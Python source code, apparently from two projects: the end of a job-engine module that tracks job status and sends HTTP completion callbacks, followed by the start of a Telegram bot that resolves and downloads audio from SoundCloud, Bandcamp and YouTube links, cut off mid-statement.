import requests action = collect_request.get('action', None) jobid = collect_request.get('jobid', None) status = collect_request.get('status', None) reply = { 'status': 'ok', 'jobid': jobid, } # Ensure we have a collector record for the jobid if jobid is not None: if jobid not in collector_data: collector_data[jobid] = { 'status': None, 'input': None, 'output': None, } runtime_lock_filepath = join(shelve_path, '%s.lock' % (jobid,)) else: runtime_lock_filepath = None args = get_collector_shelve_filepaths(collector_data, jobid) collector_shelve_input_filepath, collector_shelve_output_filepath = args print( 'on_collect_request action = %r, jobid = %r, status = %r' % ( action, jobid, status, ) ) if action == 'notification': assert None not in [jobid, runtime_lock_filepath] # received # accepted # queued # working # publishing # completed # exception # suppressed # corrupted current_status = collector_data[jobid].get('status', None) print('Updating jobid = %r status %r -> %r' % (jobid, current_status, status)) collector_data[jobid]['status'] = status print('Notify %s' % ut.repr3(collector_data[jobid])) invalidate_global_cache(jobid) if status == 'received': ut.touch(runtime_lock_filepath) if status == 'completed': if exists(runtime_lock_filepath): ut.delete(runtime_lock_filepath) # Mark the engine request as finished record_filename = '%s.pkl' % (jobid,) record_filepath = join(shelve_path, record_filename) record = ut.load_cPkl(record_filepath, verbose=False) record['completed'] = True ut.save_cPkl(record_filepath, record, verbose=False) record = None # Update relevant times in the shelf if collector_shelve_input_filepath is None: metadata = None else: metadata = 
get_shelve_value(collector_shelve_input_filepath, 'metadata') if metadata is not None: times = metadata.get('times', {}) times['updated'] = _timestamp() if status == 'working': times['started'] = _timestamp() if status == 'completed': times['completed'] = _timestamp() # Calculate runtime received = times.get('received', None) started = times.get('started', None) completed = times.get('completed', None) runtime = times.get('runtime', None) turnaround = times.get('turnaround', None) if None not in [started, completed] and runtime is None: hours, minutes, seconds, total_seconds = calculate_timedelta( started, completed ) args = ( hours, minutes, seconds, total_seconds, ) times['runtime'] = '%d hours %d min. %s sec. (total: %d sec.)' % args times['runtime_sec'] = total_seconds if None not in [received, completed] and turnaround is None: hours, minutes, seconds, total_seconds = calculate_timedelta( received, completed ) args = ( hours, minutes, seconds, total_seconds, ) times['turnaround'] = '%d hours %d min. %s sec. (total: %d sec.)' % args times['turnaround_sec'] = total_seconds metadata['times'] = times set_shelve_value(collector_shelve_input_filepath, 'metadata', metadata) metadata = None # Release memory elif action == 'register': assert None not in [jobid] invalidate_global_cache(jobid) shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) metadata = get_shelve_value(shelve_input_filepath, 'metadata') engine_result = get_shelve_value(shelve_output_filepath, 'result') if status == 'completed': # Ensure we can read the data we expect out of a completed job if None in [metadata, engine_result]: status = 'corrupted' collector_data[jobid] = { 'status': status, 'input': shelve_input_filepath, 'output': shelve_output_filepath, } print('Register %s' % ut.repr3(collector_data[jobid])) metadata, engine_result = None, None # Release memory elif action == 'metadata': invalidate_global_cache(jobid) # From the Engine metadata = collect_request.get('metadata', None) shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) collector_data[jobid]['input'] = shelve_input_filepath set_shelve_value(shelve_input_filepath, 'metadata', metadata) print('Stored Metadata %s' % ut.repr3(collector_data[jobid])) metadata = None # Release memory elif action == 'store': invalidate_global_cache(jobid) # From the Engine engine_result = collect_request.get('engine_result', None) callback_url = collect_request.get('callback_url', None) callback_method = collect_request.get('callback_method', None) # Get the engine result jobid jobid = engine_result.get('jobid', jobid) assert jobid in collector_data shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) collector_data[jobid]['output'] = shelve_output_filepath set_shelve_value(shelve_output_filepath, 'result', engine_result) print('Stored Result %s' % ut.repr3(collector_data[jobid])) engine_result = None # Release memory if callback_url is not None: if containerized: callback_url = callback_url.replace('://localhost/', '://wildbook:8080/') if callback_method is None: callback_method = 'POST' callback_method = callback_method.upper() message = 'callback_method %r unsupported' % (callback_method,) assert callback_method in ['POST', 'GET', 'PUT'], message try: data_dict = {'jobid': jobid} args = ( callback_url, callback_method, data_dict, ) print( 'Attempting job completion callback to %r\n\tHTTP Method: %r\n\tData Payload: %r' % args ) # Perform callback if callback_method == 'POST': response = 
requests.post(callback_url, data=data_dict) elif callback_method == 'GET': response = requests.get(callback_url, params=data_dict) elif callback_method == 'PUT': response = requests.put(callback_url, data=data_dict) else: raise RuntimeError() # Check response try: text = unicode(response.text).encode('utf-8') # NOQA except Exception: text = None args = ( response, text, ) print('Callback completed...\n\tResponse: %r\n\tText: %r' % args) except Exception: print('Callback FAILED!') elif action == 'job_status': reply['jobstatus'] = collector_data.get(jobid, {}).get('status', 'unknown') elif action == 'job_status_dict': json_result = {} for jobid in collector_data: if jobid in JOB_STATUS_CACHE: job_status_data = JOB_STATUS_CACHE.get(jobid, None) else: status = collector_data[jobid]['status'] shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths( ibs, jobid ) metadata = get_shelve_value(shelve_input_filepath, 'metadata') cache = True if metadata is None: if status in ['corrupted']: status = 'corrupted' elif status in ['suppressed']: status = 'suppressed' elif status in ['completed']: status = 'corrupted' else: # status = 'pending' cache = False metadata = { 'jobcounter': -1, } times = metadata.get('times', {}) request = metadata.get('request', {}) # Support legacy jobs if request is None: request = {} job_status_data = { 'status': status, 'jobcounter': metadata.get('jobcounter', None), 'action': metadata.get('action', None), 'endpoint': request.get('endpoint', None), 'function': request.get('function', None), 'time_received': times.get('received', None), 'time_started': times.get('started', None), 'time_runtime': times.get('runtime', None), 'time_updated': times.get('updated', None), 'time_completed': times.get('completed', None), 'time_turnaround': times.get('turnaround', None), 'time_runtime_sec': times.get('runtime_sec', None), 'time_turnaround_sec': times.get('turnaround_sec', None), 'lane': metadata.get('lane', None), } if cache: JOB_STATUS_CACHE[jobid] = job_status_data json_result[jobid] = job_status_data reply['json_result'] = json_result metadata = None # Release memory elif action == 'job_id_list': reply['jobid_list'] = sorted(list(collector_data.keys())) elif action == 'job_input': if jobid not in collector_data: reply['status'] = 'invalid' metadata = None else: metadata = get_shelve_value(collector_shelve_input_filepath, 'metadata') if metadata is None: reply['status'] = 'corrupted' reply['json_result'] = metadata metadata = None # Release memory elif action == 'job_result': if jobid not in collector_data: reply['status'] = 'invalid' result = None else: status = collector_data[jobid]['status'] engine_result = get_shelve_value(collector_shelve_output_filepath, 'result') if engine_result is None: if status in ['corrupted']: status = 'corrupted' elif status in ['suppressed']: status = 'suppressed' elif status in ['completed']: status = 'corrupted' else: # status = 'pending' pass reply['status'] = status result = None else: reply['status'] = engine_result['exec_status'] json_result = engine_result['json_result'] result = ut.from_json(json_result) reply['json_result'] = result engine_result = None # Release memory else: # Other print('...error unknown action=%r' % (action,)) reply['status'] = 'error' return reply def send_multipart_json(sock, idents, reply): """ helper """ reply_json = ut.to_json(reply).encode('utf-8') reply = None multi_reply = idents + [reply_json] sock.send_multipart(multi_reply) def rcv_multipart_json(sock, num=2, print=print): """ helper """ # note 
that the first two parts will be ['Controller.ROUTER', 'Client.<id_>']
    # these are needed for the reply to propagate up to the right client
    multi_msg = sock.recv_multipart()
    if VERBOSE_JOBS:
        print('----')
        print('RCV Json: %s' % (ut.repr2(multi_msg, truncate=True),))
    idents = multi_msg[:num]
    request_json = multi_msg[num]
    request = ut.from_json(request_json)
    request_json = None
    multi_msg = None
    return idents, request


def _on_ctrl_c(signal, frame):
    print('[wbia.zmq] Caught ctrl+c')
    print('[wbia.zmq] sys.exit(0)')
    import sys

    sys.exit(0)


def _init_signals():
    import signal

    signal.signal(signal.SIGINT, _on_ctrl_c)


if __name__ == '__main__':
    """
    CommandLine:
        python -m wbia.web.job_engine
        python -m wbia.web.job_engine --allexamples
        python -m wbia.web.job_engine --allexamples --noface --nosrc
    """
    import multiprocessing

    multiprocessing.freeze_support()  # for win32
    import utool as ut  # NOQA

    ut.doctest_funcs()
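# ----------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the module): driving the job
# engine end to end from a controller. It mirrors the doctests and
# job_engine_tester() above; 'testdb1' and the 'helloworld' action are taken
# from those examples as placeholders. Keyword arguments are used when queuing
# to avoid the positional callback_url/callback_method/lane pitfall noted in
# the queue_job FIXME.
#
#     import wbia
#     from wbia.web import apis_engine, job_engine
#
#     ibs = wbia.opendb(defaultdb='testdb1')
#     ibs.load_plugin_module(job_engine)
#     ibs.load_plugin_module(apis_engine)
#     ibs.initialize_job_manager()
#
#     jobiface = ibs.job_manager.jobiface
#     jobid = jobiface.queue_job(
#         'helloworld', callback_url=None, callback_method=None, lane='slow'
#     )
#     jobiface.wait_for_job_result(jobid, timeout=60)
#     print(ibs.get_job_status(jobid))            # {'status': 'ok', 'jobstatus': 'completed', ...}
#     print(jobiface.get_unpacked_result(jobid))  # 'HELLO time_=0 ...'
#
#     ibs.close_job_manager()
# ----------------------------------------------------------------------------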
scdlbot.py
# -*- coding: utf-8 -*- """Main module.""" import gc import pathlib import random import shelve import shutil from datetime import datetime from multiprocessing import Process, Queue from queue import Empty from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404 from urllib.parse import urljoin, urlparse from uuid import uuid4 import ffmpeg from boltons.urlutils import find_all_links from mutagen.id3 import ID3 from mutagen.mp3 import EasyMP3 as MP3 from prometheus_client import Summary from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup, InlineKeyboardButton, InlineQueryResultAudio, Update) from telegram.error import (TelegramError, Unauthorized, BadRequest, TimedOut, ChatMigrated, NetworkError) from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler, CallbackQueryHandler, CallbackContext) from telegram.ext.dispatcher import run_async from scdlbot.utils import * logger = logging.getLogger(__name__) REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request') class ScdlBot: def __init__(self, tg_bot_token, tg_bot_api="https://api.telegram.org", proxies=None, store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None, dl_dir="/tmp/scdlbot", dl_timeout=300, max_tg_file_size=45_000_000, max_convert_file_size=80_000_000, chat_storage_file="/tmp/scdlbotdata", app_url=None, serve_audio=False, cookies_file=None, source_ips=None): self.SITES = { "sc": "soundcloud", "scapi": "api.soundcloud", "bc": "bandcamp", "yt": "youtu", } self.APP_URL = app_url self.DL_TIMEOUT = dl_timeout self.TG_BOT_API = tg_bot_api self.MAX_TG_FILE_SIZE = max_tg_file_size self.MAX_CONVERT_FILE_SIZE = max_convert_file_size self.SERVE_AUDIO = serve_audio if self.SERVE_AUDIO: self.MAX_TG_FILE_SIZE = 19_000_000 self.HELP_TEXT = get_response_text('help.tg.md') self.SETTINGS_TEXT = get_response_text('settings.tg.md') self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60) self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'), get_response_text('wait_beet.txt')] self.NO_AUDIO_TEXT = get_response_text('no_audio.txt') self.NO_URLS_TEXT = get_response_text('no_urls.txt') self.OLG_MSG_TEXT = get_response_text('old_msg.txt') self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt') self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt') self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt') # self.chat_storage = {} self.chat_storage = shelve.open(chat_storage_file, writeback=True) for chat_id in no_flood_chat_ids: self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no") self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set() self.STORE_CHAT_ID = store_chat_id self.DL_DIR = dl_dir self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt" self.proxies = proxies self.source_ips = source_ips # https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html self.cookies_file = cookies_file # if sc_auth_token: # config = configparser.ConfigParser() # config['scdl'] = {} # config['scdl']['path'] = self.DL_DIR # config['scdl']['auth_token'] = sc_auth_token # config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl') # config_path = os.path.join(config_dir, 'scdl.cfg') # os.makedirs(config_dir, exist_ok=True) # with open(config_path, 'w') as config_file: # config.write(config_file) self.updater = 
Updater(token=tg_bot_token, base_url=f"{self.TG_BOT_API}/bot", use_context=True, base_file_url=f"{self.TG_BOT_API}/file/bot") dispatcher = self.updater.dispatcher start_command_handler = CommandHandler('start', self.help_command_callback) dispatcher.add_handler(start_command_handler) help_command_handler = CommandHandler('help', self.help_command_callback) dispatcher.add_handler(help_command_handler) settings_command_handler = CommandHandler('settings', self.settings_command_callback) dispatcher.add_handler(settings_command_handler) dl_command_handler = CommandHandler('dl', self.common_command_callback, filters=~Filters.update.edited_message & ~Filters.forwarded) dispatcher.add_handler(dl_command_handler) link_command_handler = CommandHandler('link', self.common_command_callback, filters=~Filters.update.edited_message & ~Filters.forwarded) dispatcher.add_handler(link_command_handler) message_with_links_handler = MessageHandler(~Filters.update.edited_message & ~Filters.command & ((Filters.text & (Filters.entity(MessageEntity.URL) | Filters.entity(MessageEntity.TEXT_LINK))) | (Filters.caption & (Filters.caption_entity(MessageEntity.URL) | Filters.caption_entity( MessageEntity.TEXT_LINK)))), self.common_command_callback) dispatcher.add_handler(message_with_links_handler) button_query_handler = CallbackQueryHandler(self.button_query_callback) dispatcher.add_handler(button_query_handler) inline_query_handler = InlineQueryHandler(self.inline_query_callback) dispatcher.add_handler(inline_query_handler) unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback) dispatcher.add_handler(unknown_handler) dispatcher.add_error_handler(self.error_callback) self.bot_username = self.updater.bot.get_me().username self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me" self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format( self.bot_username) def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None, url_path="scdlbot"): if use_webhook: self.updater.start_webhook(listen=webhook_host, port=webhook_port, url_path=url_path) # cert=cert_file if cert_file else None, # key=cert_key_file if cert_key_file else None, # webhook_url=urljoin(app_url, url_path)) self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path), certificate=open(cert_file, 'rb') if cert_file else None) else: self.updater.start_polling() logger.warning("Bot started") self.updater.idle() def unknown_command_callback(self, update: Update, context: CallbackContext): pass # bot.send_message(chat_id=update.message.chat_id, text="Unknown command") def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201 try: raise context.error except Unauthorized: # remove update.message.chat_id from conversation list logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error)) except BadRequest: # handle malformed requests - read more below! 
logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error)) except TimedOut: # handle slow connection problems logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error)) except NetworkError: # handle other connection problems logger.debug('Update {} caused NetworkError: {}'.format(update, context.error)) except ChatMigrated as e: # the chat_id of a group has changed, use e.new_chat_id instead logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error)) except TelegramError: # handle all other telegram related errors logger.debug('Update {} caused TelegramError: {}'.format(update, context.error)) def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"): if message: chat_id = str(message.chat_id) chat_type = message.chat.type else: chat_id = str(chat_id) if chat_id not in self.chat_storage: self.chat_storage[chat_id] = {} if "settings" not in self.chat_storage[chat_id]: self.chat_storage[chat_id]["settings"] = {} if "mode" not in self.chat_storage[chat_id]["settings"]: if chat_type == Chat.PRIVATE: self.chat_storage[chat_id]["settings"]["mode"] = "dl" else: self.chat_storage[chat_id]["settings"]["mode"] = "ask" if "flood" not in self.chat_storage[chat_id]["settings"]: self.chat_storage[chat_id]["settings"]["flood"] = flood if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]: self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = [] self.chat_storage.sync() # logger.debug("Current chat_storage: %r", self.chat_storage) def cleanup_chat(self, chat_id): chat_msgs = self.chat_storage[str(chat_id)].copy() for msg_id in chat_msgs: if msg_id != "settings": timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date if timedelta.days > 0: self.chat_storage[str(chat_id)].pop(msg_id) self.chat_storage.sync() def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None): rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=rant_text, parse_mode='Markdown', disable_web_page_preview=True) flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if flood == "no": rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy() for rant_msg_id in rant_msgs: try: bot.delete_message(chat_id=chat_id, message_id=rant_msg_id) except: pass self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id) self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id) self.chat_storage.sync() def help_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) event_name = "help" entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND]) for entity_value in entities.values(): event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "") break log_and_track(event_name, update.message) chat_id = update.message.chat_id chat_type = update.message.chat.type reply_to_message_id = update.message.message_id flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if chat_type != Chat.PRIVATE and flood == "no": self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id) else: context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT, parse_mode='Markdown', disable_web_page_preview=True) def get_wait_text(self): return random.choice(self.WAIT_BIT_TEXT) def get_settings_inline_keyboard(self, chat_id): mode = 
self.chat_storage[str(chat_id)]["settings"]["mode"] flood = self.chat_storage[str(chat_id)]["settings"]["flood"] emoji_yes = "✅" emoji_no = "❌" button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]), callback_data=" ".join(["settings", "dl"])) button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]), callback_data=" ".join(["settings", "link"])) button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]), callback_data=" ".join(["settings", "ask"])) button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]), callback_data=" ".join(["settings", "flood"])) button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]), callback_data=" ".join(["settings", "close"])) inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]]) return inline_keyboard def settings_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) log_and_track("settings") chat_id = update.message.chat_id context.bot.send_message(chat_id=chat_id, parse_mode='Markdown', reply_markup=self.get_settings_inline_keyboard(chat_id), text=self.SETTINGS_TEXT) def common_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) chat_id = update.message.chat_id chat_type = update.message.chat.type reply_to_message_id = update.message.message_id command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND]) if not command_entities: command_passed = False # if no command then it is just a message and use default mode mode = self.chat_storage[str(chat_id)]["settings"]["mode"] else: command_passed = True # try to determine mode from command mode = None for entity_value in command_entities.values(): mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "") break if not mode: mode = "dl" if command_passed and not context.args: rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format( mode) self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id) return # apologize and send TYPING: always in PM and only when it's command in non-PM apologize = chat_type == Chat.PRIVATE or command_passed if apologize: context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING) source_ip = None proxy = None if self.source_ips: source_ip = random.choice(self.source_ips) if self.proxies: proxy = random.choice(self.proxies) # TODO find working IP? 
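# Note on the call below: prepare_urls() (defined further down) returns a dict keyed by the
# normalized URL text; each value is either a newline-separated list of resolved direct URLs,
# the placeholder string "http" (recognized link, resolution deferred until download), or a
# short error status such as "direct"/"country"/"live"/"timeout" that download_url_and_send()
# later maps to a user-facing message.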
urls = self.prepare_urls(msg_or_text=update.message, direct_urls=(mode == "link"), source_ip=source_ip, proxy=proxy) logger.debug(urls) if not urls: if apologize: context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.NO_URLS_TEXT, parse_mode='Markdown') else: event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode)) log_and_track(event_name, update.message) if mode == "dl": wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', text=get_italic(self.get_wait_text())) for url in urls: self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id, reply_to_message_id=reply_to_message_id, wait_message_id=wait_message.message_id, source_ip=source_ip, proxy=proxy) elif mode == "link": wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', text=get_italic(self.get_wait_text())) link_text = get_link_text(urls) context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, parse_mode='Markdown', disable_web_page_preview=True, text=link_text if link_text else self.NO_URLS_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id) elif mode == "ask": # ask: always in PM and only if good urls exist in non-PM if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()): orig_msg_id = str(reply_to_message_id) self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls, "source_ip": source_ip, "proxy": proxy} question = "🎶 links found, what to do?" button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"])) button_link = InlineKeyboardButton(text="❇️ Links", callback_data=" ".join([orig_msg_id, "link"])) button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"])) inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]]) context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, reply_markup=inline_keyboard, text=question) self.cleanup_chat(chat_id) def button_query_callback(self, update: Update, context: CallbackContext): btn_msg = update.callback_query.message self.init_chat(btn_msg) user_id = update.callback_query.from_user.id btn_msg_id = btn_msg.message_id chat = btn_msg.chat chat_id = chat.id chat_type = chat.type orig_msg_id, action = update.callback_query.data.split() if orig_msg_id == "settings": if chat_type != Chat.PRIVATE: chat_member_status = chat.get_member(user_id).status if chat_member_status not in [ChatMember.ADMINISTRATOR, ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS: log_and_track("settings_fail") update.callback_query.answer(text="You're not chat admin") return log_and_track("settings_{}".format(action), btn_msg) if action == "close": context.bot.delete_message(chat_id, btn_msg_id) else: setting_changed = False if action in ["dl", "link", "ask"]: current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"] if action != current_setting: setting_changed = True self.chat_storage[str(chat_id)]["settings"]["mode"] = action elif action in ["flood"]: current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"] setting_changed = True self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes" if setting_changed: self.chat_storage.sync() update.callback_query.answer(text="Settings changed") 
update.callback_query.edit_message_reply_markup(parse_mode='Markdown', reply_markup=self.get_settings_inline_keyboard( chat_id)) else: update.callback_query.answer(text="Settings not changed") elif orig_msg_id in self.chat_storage[str(chat_id)]: msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id) orig_msg = msg_from_storage["message"] urls = msg_from_storage["urls"] source_ip = msg_from_storage["source_ip"] proxy = msg_from_storage["proxy"] log_and_track("{}_msg".format(action), orig_msg) if action == "dl": update.callback_query.answer(text=self.get_wait_text()) wait_message = update.callback_query.edit_message_text(parse_mode='Markdown', text=get_italic(self.get_wait_text())) for url in urls: self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id, reply_to_message_id=orig_msg_id, wait_message_id=wait_message.message_id, source_ip=source_ip, proxy=proxy) elif action == "link": update.callback_query.answer(text=self.get_wait_text()) wait_message = update.callback_query.edit_message_text(parse_mode='Markdown', text=get_italic(self.get_wait_text())) urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy) link_text = get_link_text(urls) context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id, parse_mode='Markdown', disable_web_page_preview=True, text=link_text if link_text else self.NO_URLS_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id) elif action == "nodl": context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id) else: update.callback_query.answer(text=self.OLG_MSG_TEXT) context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id) def inline_query_callback(self, update: Update, context: CallbackContext): log_and_track("link_inline") inline_query_id = update.inline_query.id text = update.inline_query.query results = [] urls = self.prepare_urls(msg_or_text=text, direct_urls=True) for url in urls: for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc logger.debug(direct_url) results.append( InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD")) try: context.bot.answer_inline_query(inline_query_id, results) except: pass def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None): if isinstance(msg_or_text, Message): urls = [] url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL]) url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL]) url_entities.update(url_caption_entities) for entity in url_entities: url_str = url_entities[entity] logger.debug("Entity URL Parsed: %s", url_str) if "://" not in url_str: url_str = "http://{}".format(url_str) urls.append(URL(url_str)) text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK]) text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK]) text_link_entities.update(text_link_caption_entities) for entity in text_link_entities: url_str = entity.url logger.debug("Entity Text Link Parsed: %s", url_str) urls.append(URL(url_str)) else: urls = find_all_links(msg_or_text, default_scheme="http") urls_dict = {} for url_item in urls: url = url_item # unshorten soundcloud.app.goo.gl and other links, but not tiktok: if "tiktok" not in url_item.host: try: url = URL(requests.head(url_item, allow_redirects=True).url) except: pass url_text = url.to_text(True) #FIXME crutch: url_text = url_text.replace("m.soundcloud.com", "soundcloud.com") 
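# Heuristic URL filter used below: keep SoundCloud track/set/widget pages (but not /you/
# pages), Bandcamp track/album pages and YouTube videos/playlists; any host not listed in
# SITES is probed directly with get_direct_urls() (youtube-dl), and recognized hosts that
# fail the checks are dropped.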
url_parts_num = len([part for part in url.path_parts if part]) try: if ( # SoundCloud: tracks, sets and widget pages, no /you/ pages #TODO private sets are 5 (self.SITES["sc"] in url.host and (2 <= url_parts_num <= 4 or self.SITES["scapi"] in url_text) and ( not "you" in url.path_parts)) or # Bandcamp: tracks and albums (self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or # YouTube: videos and playlists (self.SITES["yt"] in url.host and ( "youtu.be" in url.host or "watch" in url.path or "playlist" in url.path)) ): if direct_urls or self.SITES["yt"] in url.host: urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE, source_ip, proxy) else: urls_dict[url_text] = "http" elif not any((site in url.host for site in self.SITES.values())): urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE, source_ip, proxy) except ProcessExecutionError: logger.debug("youtube-dl get-url failed: %s", url_text) except URLError as exc: urls_dict[url_text] = exc.status return urls_dict @REQUEST_TIME.time() @run_async def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None, wait_message_id=None, source_ip=None, proxy=None): bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO) download_dir = os.path.join(self.DL_DIR, str(uuid4())) shutil.rmtree(download_dir, ignore_errors=True) os.makedirs(download_dir) status = 0 if direct_urls == "direct": status = -3 elif direct_urls == "country": status = -4 elif direct_urls == "live": status = -5 elif direct_urls == "timeout": status = -6 else: if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url): cmd_name = "scdl" cmd_args = [] cmd = None cmd_input = None if self.SITES["sc"] in url and self.SITES["scapi"] not in url: cmd = scdl_bin cmd_name = str(cmd) cmd_args = ( "-l", url, # URL of track/playlist/user "-c", # Continue if a music already exist "--path", download_dir, # Download the music to a custom path "--onlymp3", # Download only the mp3 file even if the track is Downloadable "--addtofile", # Add the artist name to the filename if it isn't in the filename already "--addtimestamp", # Adds the timestamp of the creation of the track to the title (useful to sort chronologically) "--no-playlist-folder", # Download playlist tracks into directory, instead of making a playlist subfolder "--extract-artist", # Set artist tag from title instead of username ) cmd_input = None elif self.SITES["bc"] in url: cmd = bandcamp_dl_bin cmd_name = str(cmd) cmd_args = ( "--base-dir", download_dir, # Base location of which all files are downloaded "--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template "--overwrite", # Overwrite tracks that already exist "--group", # Use album/track Label as iTunes grouping "--embed-art", # Embed album art (if available) "--no-slugify", # Disable slugification of track, album, and artist names url, # URL of album/track ) cmd_input = "yes" logger.info("%s starts: %s", cmd_name, url) cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True) try: cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT) cmd_retcode = cmd_proc.returncode # TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr: if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable", "Failed to get item"]) and ".mp3" not in cmd_stderr): raise 
